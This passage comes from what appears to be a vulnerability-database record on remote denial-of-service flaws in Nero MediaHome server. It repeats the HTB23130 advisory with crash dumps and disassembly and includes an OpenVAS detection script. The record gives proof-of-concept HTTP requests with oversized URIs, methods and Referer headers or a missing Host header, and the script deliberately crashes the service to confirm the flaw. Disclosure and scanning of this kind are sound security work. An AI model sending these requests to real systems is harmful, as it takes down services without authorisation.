D&|>|>|h& (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 00000000 ( 0) -> N/A \n \n \nDisasm around: \n \n0x7c921664 mov ecx,[ebp+0x10] \n0x7c921667 add eax,[ecx] \n0x7c921669 cmp eax,0xfe00 \n0x7c92166e ja 0x7c920721 \n0x7c921674 cmp byte [ebp+0x14],0x0 \n0x7c921678 jnz 0x7c95ae10 \n0x7c92167e mov ecx,[esi+0xc] \n0x7c921681 lea eax,[esi+0x8] \n0x7c921684 mov edx,[eax] \n0x7c921686 mov [ebp+0x8],ecx \n0x7c921689 mov ecx,[ecx] \n0x7c92168b cmp ecx,[edx+0x4] \n0x7c92168e mov [ebp+0xc],edx \n0x7c921691 jnz 0x7c921734 \n0x7c921697 cmp ecx,eax \n0x7c921699 jnz 0x7c921734 \n0x7c92169f push esi \n0x7c9216a0 push ebx \n0x7c9216a1 call 0x7c920684 \n0x7c9216a6 mov eax,[ebp+0xc] \n0x7c9216a9 mov ecx,[ebp+0x8] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nGET /[A * 500000] HTTP/1.1 \nHOST: somehost.com \nACCEPT: */* \nAccept-Encoding: None \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nConnection: Close \nAccept-Transfer-Encoding: None \n \n \n \n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server. 
\n \nCrash details: \n \nEIP: 7c921689 mov ecx,[ecx] \nEAX: 03b63008 ( 62271496) -> (heap) \nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap) \nECX: 00000000 ( 0) -> N/A \nEDX: 00000000 ( 0) -> N/A \nEDI: 03b64000 ( 62275584) -> B (heap) \nESI: 03b63000 ( 62271488) -> (heap) \nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack) \nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack) \n+00: 003e0000 ( 4063232) -> # 8@>+ (heap) \n+04: 00000021 ( 33) -> N/A \n+08: 003e0004 ( 4063236) -> # 8@>+ (heap) \n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 00000000 ( 0) -> N/A \n \n \nDisasm around: \n \n0x7c921664 mov ecx,[ebp+0x10] \n0x7c921667 add eax,[ecx] \n0x7c921669 cmp eax,0xfe00 \n0x7c92166e ja 0x7c920721 \n0x7c921674 cmp byte [ebp+0x14],0x0 \n0x7c921678 jnz 0x7c95ae10 \n0x7c92167e mov ecx,[esi+0xc] \n0x7c921681 lea eax,[esi+0x8] \n0x7c921684 mov edx,[eax] \n0x7c921686 mov [ebp+0x8],ecx \n0x7c921689 mov ecx,[ecx] \n0x7c92168b cmp ecx,[edx+0x4] \n0x7c92168e mov [ebp+0xc],edx \n0x7c921691 jnz 0x7c921734 \n0x7c921697 cmp ecx,eax \n0x7c921699 jnz 0x7c921734 \n0x7c92169f push esi \n0x7c9216a0 push ebx \n0x7c9216a1 call 0x7c920684 \n0x7c9216a6 mov eax,[ebp+0xc] \n0x7c9216a9 mov ecx,[ebp+0x8] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nHEAD / [A * 265696] HTTP/1.1 \nACCEPT: */* \nAccept-Encoding: None \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nConnection: Close \nAccept-Transfer-Encoding: None \n \n \n \n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. 
A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c920a1b cmp ecx,[edx+0x4] \nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEBX: 003e0000 ( 4063232) -> @>+ (heap) \nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEDX: 03b50101 ( 62193921) -> N/A \nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap) \nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEBP: 033bfc78 ( 54262904) -> L;L (stack) \nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack) \n+00: 003e0000 ( 4063232) -> @>+ (heap) \n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack) \n+10: 7c92084c (2089945164) -> N/A \n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap) \n \n \nDisasm around: \n \n0x7c9209fe mov al,[esi+0x5] \n0x7c920a01 and al,0x10 \n0x7c920a03 test al,0x10 \n0x7c920a05 mov [edi+0x5],al \n0x7c920a08 jnz 0x7c920aa0 \n0x7c920a0e mov ecx,[esi+0xc] \n0x7c920a11 lea eax,[esi+0x8] \n0x7c920a14 mov edx,[eax] \n0x7c920a16 mov [ebp+0xc],ecx \n0x7c920a19 mov ecx,[ecx] \n0x7c920a1b cmp ecx,[edx+0x4] \n0x7c920a1e mov [ebp+0x14],edx \n0x7c920a21 jnz 0x7c921752 \n0x7c920a27 cmp ecx,eax \n0x7c920a29 jnz 0x7c921752 \n0x7c920a2f push esi \n0x7c920a30 push ebx \n0x7c920a31 call 0x7c920684 \n0x7c920a36 mov eax,[ebp+0x14] \n0x7c920a39 mov ecx,[ebp+0xc] \n0x7c920a3c cmp eax,ecx \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nOPTIONS / [A * 265712] \nHost: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nReferer: http://www.host.com \n \n \n \n1.4 The 
vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c920a19 mov ecx,[ecx] \nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap) \nECX: 41414141 (1094795585) -> N/A \nEDX: 41414141 (1094795585) -> N/A \nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap) \nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBP: 0527f828 ( 86505512) -> `' (stack) \nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack) \n+00: 003e0000 ( 4063232) -> Tp@>+ (heap) \n+04: 00000021 ( 33) -> N/A \n+08: 003e0004 ( 4063236) -> Tp@>+ (heap) \n+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap) \n \n \nDisasm around: \n \n0x7c9209f8 jnz 0x7c95af5f \n0x7c9209fe mov al,[esi+0x5] \n0x7c920a01 and al,0x10 \n0x7c920a03 test al,0x10 \n0x7c920a05 mov [edi+0x5],al \n0x7c920a08 jnz 0x7c920aa0 \n0x7c920a0e mov ecx,[esi+0xc] \n0x7c920a11 lea eax,[esi+0x8] \n0x7c920a14 mov edx,[eax] 
\n0x7c920a16 mov [ebp+0xc],ecx \n0x7c920a19 mov ecx,[ecx] \n0x7c920a1b cmp ecx,[edx+0x4] \n0x7c920a1e mov [ebp+0x14],edx \n0x7c920a21 jnz 0x7c921752 \n0x7c920a27 cmp ecx,eax \n0x7c920a29 jnz 0x7c921752 \n0x7c920a2f push esi \n0x7c920a30 push ebx \n0x7c920a31 call 0x7c920684 \n0x7c920a36 mov eax,[ebp+0x14] \n0x7c920a39 mov ecx,[ebp+0xc] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nGET / HTTP/1.1 \nHost: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer:[A * 265566] \n \n \n \n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877 \n \n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request. \n \nCrash details: \n \nEIP: 10003171 mov [eax+0x18],ebp \nEAX: 00000000 ( 0) -> N/A \nEBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) \nECX: 039cddea ( 60612074) -> localhost (heap) \nEDX: 039cddea ( 60612074) -> localhost (heap) \nEDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap) \nESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap) \nEBP: 00000009 ( 9) -> N/A \nESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack) \n+00: 037bd090 ( 58445968) -> x4xx @R px?x? 
(heap) \n+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 00000001 ( 1) -> N/A \n+10: 000000b8 ( 184) -> N/A \n+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap) \n \n \nDisasm around: \n \n0x10003156 mov edx,[esi+0x8] \n0x10003159 mov ebp,[esi+0xc] \n0x1000315c push byte 0x1 \n0x1000315e push eax \n0x1000315f push ecx \n0x10003160 push ebx \n0x10003161 mov [edi+0x40],esi \n0x10003164 mov [esp+0x2c],edx \n0x10003168 call 0x10002730 \n0x1000316d mov ecx,[esp+0x2c] \n0x10003171 mov [eax+0x18],ebp \n0x10003174 mov ebp,[esp+0x24] \n0x10003178 add esp,0x10 \n0x1000317b mov [eax+0x14],ecx \n0x1000317e mov edx,[ebp+0x8] \n0x10003181 test edx,edx \n0x10003183 mov [esp+0x14],edx \n0x10003187 jnz 0x10002ff0 \n0x1000318d mov eax,[esp+0x24] \n0x10003191 push eax \n0x10003192 call 0x10002c20 \n \n \nProof of Concept: \nThe following HTTP request will crash Nero MediaHome server remotely: \n \nGET / HTTP/1.1 \n: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer: http://www.host.com \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nVendor last response (January 9, 2013): \n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\" \n \nAs a temporary solution it is advised to remove the vulnerable application from your system. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities. 
\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119424/neromediahome-dos.txt"}], "openvas": [{"lastseen": "2020-07-21T21:59:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "description": "Nero MediaHome Server is prone to multiple denial of service\n vulnerabilities.", "modified": "2020-07-16T00:00:00", "published": "2013-01-10T00:00:00", "id": "OPENVAS:1361412562310803150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803150", "type": "openvas", "title": "Nero MediaHome Server Multiple Remote DoS Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Nero MediaHome Server Multiple Remote DoS Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under 
the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803150\");\n script_version(\"2020-07-16T08:52:35+0000\");\n script_cve_id(\"CVE-2012-5876\", \"CVE-2012-5877\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 08:52:35 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-10 14:19:03 +0530 (Thu, 10 Jan 2013)\");\n script_name(\"Nero MediaHome Server Multiple Remote DoS Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"Nero MediaHome Server is prone to multiple denial of service\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"This test works by sending a big size request to the target\n service listening on port 54444/TCP and checking that the target service is dead.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. 
General solution options\n are to upgrade to a newer release, disable respective features, remove the product or replace the\n product by another one.\");\n\n script_tag(name:\"affected\", value:\"Nero MediaHome Server version 4.5.8.100 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper handling of the URI length,\n HTTP OPTIONS method length, HTTP HEAD request, HTTP REFERER and HTTP HOST header\n within the 'NMMediaServer.dll' in dynamic-link library which allows attackers to\n cause denial of service condition by sending a specially crafted packet\n to port 54444/TCP.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause the\n application to crash, creating a denial-of-service condition.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://inter5.org/archives/226548\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Jan/36\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23130\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/525249/30/0/threaded\");\n\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 54444);\n script_mandatory_keys(\"Nero-MediaHome/banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:54444);\n\nbanner = http_get_remote_headers(port:port);\nif(!banner || \"Nero-MediaHome/\" >!< banner)\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nreq = http_get(item:string(\"/A\", crap(500000)), port:port);\n\nfor(i = 0; i < 5; i++)\n http_send_recv(port:port, data:req);\n\nsleep(2);\n\nif(http_is_dead(port:port)) {\n security_message(port:port);\n 
exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2022-06-02T22:09:58", "description": "", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "exploitdb", "title": "Nero MediaHome 4.5.8.0 - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2012-5876", "2012-5877", "CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "EDB-ID:24022", "href": "https://www.exploit-db.com/exploits/24022", "sourceData": "Advisory ID: HTB23130\r\nProduct: Nero MediaHome\r\nVendor: Nero\r\nVulnerable Version(s): 4.5.8.0 and probably prior\r\nTested Version: 4.5.8.0 in Windows 7 SP1\r\nVendor Notification: November 21, 2012 \r\nPublic Disclosure: January 9, 2013 \r\nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\r\nCVE References: CVE-2012-5876, CVE-2012-5877\r\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\r\nRisk Level: Low \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\r\n\r\n\r\n1) Improper Handling of 
Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\r\n\r\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b2a808 ( 62040072) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b2b000 ( 62042112) -> D (heap)\r\nESI: 03b2a800 ( 62040064) -> (heap)\r\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\r\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\r\n+00: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\n+04: 00000022 ( 34) -> N/A\r\n+08: 003e0004 ( 4063236) -> b@>@>\" (heap)\r\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. 
D&|>|>|h& (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET /[A * 500000] HTTP/1.1\r\nHOST: somehost.com\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. 
A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b63008 ( 62271496) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b64000 ( 62275584) -> B (heap)\r\nESI: 03b63000 ( 62271488) -> (heap)\r\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\r\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\r\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\n+04: 00000021 ( 33) -> N/A\r\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\r\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nHEAD / [A * 265696] HTTP/1.1\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.3 The vulnerability exists due 
to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c920a1b cmp ecx,[edx+0x4]\r\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\r\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEDX: 03b50101 ( 62193921) -> N/A\r\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap)\r\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\r\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\r\n+00: 003e0000 ( 4063232) -> @>+ (heap)\r\n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap)\r\n+08: 00000000 ( 0) -> N/A\r\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\r\n+10: 7c92084c (2089945164) -> N/A\r\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n 0x7c920a3c cmp eax,ecx\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nOPTIONS / [A 
* 265712]\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nReferer: http://www.host.com\r\n\r\n\r\n\r\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \r\n\r\nCrash details:\r\n\r\nEIP: 7c920a19 mov ecx,[ecx]\r\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 